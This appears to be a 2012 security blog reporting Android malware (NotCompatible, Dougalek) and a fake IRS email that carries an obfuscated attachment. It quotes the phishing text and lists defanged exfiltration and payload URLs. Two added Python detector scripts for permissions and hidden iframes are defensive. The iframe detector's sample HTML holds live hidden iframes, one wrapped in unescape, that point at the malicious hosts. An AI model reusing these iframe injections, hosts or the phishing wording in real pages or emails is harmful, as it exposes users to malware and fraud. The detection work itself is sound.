Thursday, May 3, 2012

NotCompatible Android Malware: First-known Android Drive-By Download Attack

On May 2nd 2012, Lookout reported the first known incident where compromised websites are being used to serve malicious apps to Android users.
"NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy." - Lookout

Some of the compromised sites that we have seen carry the following injected hidden iframes:

Unsuspecting mobile users browsing the hacked sites are tricked into installing NotCompatible, which masquerades as a system update (the downloaded file is named Update.apk).

Luckily, Android users who have the 'Unknown Sources' application setting turned off are not affected by this attack: the browser may still download Update.apk, but the system refuses to install a package that did not come from the Android Market, so the trojan never runs.

Tuesday, April 17, 2012

Android Malware Dougalek Steals Contact Information

Dougalek is a mobile malware that runs on Android devices. It downloads and plays movie clips from a predetermined remote website while stealing information in the background.

The mobile malware requests the following permissions:

INTERNET - Allows applications to open network sockets.
READ_CONTACTS - Allows an application to read the user's contacts data.
READ_PHONE_STATE - Allows read only access to phone state.

Dougalek Permissions

The requested permissions give the mobile malware away: an app that claims only to play video clips has no reason to read the user's contacts or the phone's identity, so it asks for more than what it is trying to portray.
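The permission check described above can be done mechanically. The script below is an added example for this post, not code from the Dougalek analysis or from any tool: it reads the uses-permission entries out of a decoded AndroidManifest.xml and reports the ones a video player has no business requesting. The manifest is constructed to match the three permissions listed above, and the "expected for a video player" set is an assumption made for the illustration.

```python
"""Triage an Android manifest's requested permissions against what the
app claims to do.

Added example; not code from the Dougalek analysis or from any vendor.
The manifest below is constructed to carry the three permissions named in
the post, and EXPECTED_FOR_VIDEO_PLAYER is an assumption for the example.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed decoded AndroidManifest.xml. An apk carries the manifest in
# binary form; tools such as aapt or apktool emit this textual form.
SAMPLE_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="com.example.movieplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <application android:label="Movie Player"/>
</manifest>"""

# Permissions that reach data the user did not hand to the app.
SENSITIVE = {
    "android.permission.READ_CONTACTS": "address book",
    "android.permission.READ_PHONE_STATE": "IMEI / phone number / call state",
    "android.permission.READ_SMS": "text messages",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.RECORD_AUDIO": "microphone",
}

# What a streaming video player plausibly needs (assumption for the example).
EXPECTED_FOR_VIDEO_PLAYER = {"android.permission.INTERNET"}


def requested_permissions(manifest_xml):
    """Set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {
        el.get(f"{{{ANDROID_NS}}}name")
        for el in root.iter("uses-permission")
    }


def excess_permissions(manifest_xml, expected):
    """Requested permissions not justified by the app's stated purpose,
    each tagged with what it reaches if it is on the sensitive list."""
    extra = requested_permissions(manifest_xml) - expected
    return sorted((p, SENSITIVE.get(p, "not in sensitive list")) for p in extra)


def looks_overprivileged(manifest_xml, expected):
    """True when at least one excess permission touches sensitive data."""
    return any(p in SENSITIVE for p, _ in excess_permissions(manifest_xml, expected))


if __name__ == "__main__":
    for perm, reach in excess_permissions(SAMPLE_MANIFEST, EXPECTED_FOR_VIDEO_PLAYER):
        print(f"{perm}: {reach}")
```

Run against a real sample, decode the manifest first (aapt dump xmltree or apktool) and adjust the expected set to whatever the app claims to be; the point is the gap between the claim and the request, not the absolute list.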

Dougalek Installed on the Android Device

Upon execution, Dougalek collects information from the infected Android device and sends the stolen data to:

hxxp://depot.bulks.jp/get[random].php

Dougalek Stealing Contact Information

It also attempts to download and play a video from:

hxxp://depot.bulks.jp/movie/movie[random].mp4

Meanwhile the affected user only sees this on the screen:

Dougalek stealing information in the background

Friday, April 6, 2012

Google's Project Glass

image courtesy of wired.com

Google has recently unveiled Project Glass.

The idea is an augmented-reality device that delivers Google services through a pair of slim eyewear.

It sounds cool to be able to take photos of exactly what you are looking at, share them with your friends immediately, pull up maps, and so on.

But Google is an ad company, and this technology would bring the ads straight to our eyeballs.

The potential applications for this kind of technology are endless, but one thing I am sure of: the cyber criminals are looking forward to it too.


Tuesday, March 27, 2012

Fake IRS Income Tax Appeal Rejection Notice


Your income tax appeal has been declined!

Unsuspecting users who receive this fake notification by email, telling them that their income tax appeal has been rejected, are lured into opening and executing the malicious attachment.

The cyber criminals combine scare tactics with a legitimate-looking rejection notice. Sample message:

Dear Chief Account Officer,

Hereby you are notified that your Income Tax Refund Appeal id# has been REJECTED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.

Internal Revenue Service
Telephone Assistance for Businesses:
Toll-Free, 1-800-829-4933
Hours of Operation: Monday - Friday, 7:00 a.m. - 7:00 p.m. your local time (Alaska & Hawaii follow Pacific Time).

The attachment is an HTML file containing an obfuscated malicious script.

Successfully deobfuscating the script yields an embedded iframe that loads content from a remote host:

The hidden iframe has been seen loading these URLs:

hxxp://djhasjhjdllaloks.ru:8080/images/aublbzdni.php
hxxp://rusifhasdiuhfs.su:8080/images/aublbzdni.php
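Both the NotCompatible injections above and this attachment come down to the same artifact: an iframe the victim is not meant to see. The script below is an added example, not code from either analysis or from any vendor, that pulls iframes out of an HTML document, unwraps the one very common `document.write(unescape("..."))` wrapper so the parser sees what the script would have emitted, and flags iframes that are hidden by style or size or that point at the hosts listed above. The sample HTML is constructed for the illustration; the unwrapping handles only that one wrapper, not the specific obfuscation used in the real attachment, which is why the deobfuscation step in the analysis still has to be done by hand or in a JavaScript sandbox.

```python
"""Extract iframes from HTML, including ones emitted through a simple
document.write(unescape("...")) wrapper, and flag the hidden ones.

Added example for this post; not code from the malware, the attachment
or any vendor tool. SAMPLE_HTML is constructed for illustration and the
unwrapping covers only the document.write(unescape(...)) wrapper.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: one hidden iframe injected directly into the page,
# one produced by document.write(unescape(...)), and one legitimate embed.
# Hostnames are the defanged ones from the post, re-armed for parsing.
SAMPLE_HTML = """<html><body>
<p>Welcome</p>
<iframe src="http://djhasjhjdllaloks.ru:8080/images/aublbzdni.php"
        width="1" height="1" style="visibility:hidden"></iframe>
<script>
document.write(unescape("%3Ciframe%20src%3D%22http%3A//rusifhasdiuhfs.su%3A8080/images/aublbzdni.php%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E"));
</script>
<iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe>
</body></html>"""

# Hosts named in the post (re-armed from hxxp://).
KNOWN_BAD_HOSTS = {"djhasjhjdllaloks.ru", "rusifhasdiuhfs.su"}

# document.write(unescape("...")) with a plain double-quoted string literal.
# JavaScript's unescape() also decodes %uXXXX; urllib's unquote does not.
_DOCWRITE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*"((?:[^"\\]|\\.)*)"\s*\)\s*\)', re.I)


def unwrap_document_write(html):
    """Append the decoded payload of each document.write(unescape("..."))
    call so the HTML parser sees the markup the script would have written."""
    decoded = [unquote(m.group(1)) for m in _DOCWRITE.finditer(html)]
    return html + "\n" + "\n".join(decoded)


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """Width/height of at most one pixel (or percent) counts as hidden."""
    try:
        return float(value.strip().rstrip("px%")) <= 1
    except ValueError:
        return False


def is_hidden(attrs):
    """Heuristics for an iframe the visitor is not meant to see."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", ""))


def extract_iframes(html):
    """Every iframe in the document (after unwrapping), with verdict fields."""
    parser = _IframeCollector()
    parser.feed(unwrap_document_write(html))
    results = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or ""
        results.append({
            "src": src,
            "host": host,
            "hidden": is_hidden(attrs),
            "known_bad": host in KNOWN_BAD_HOSTS,
        })
    return results


def suspicious_iframes(html):
    """Iframes that are hidden, point at a known bad host, or both."""
    return [r for r in extract_iframes(html) if r["hidden"] or r["known_bad"]]


if __name__ == "__main__":
    for r in extract_iframes(SAMPLE_HTML):
        print(r)
```

The hidden-size and style heuristics are what catch an injection on a compromised site before any host is known; the host match is what catches a known campaign once indicators like the two above have been published. Both checks belong in a mail-gateway or web-proxy inspection step, since neither requires executing the script.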

We advise our readers to be wary of email attachments like these; the IRS does not initiate contact with taxpayers by email, so a rejection notice with an attachment is a red flag on its own.

Ensure that the latest security patches and updates are applied to your computer, and keep your security software up-to-date.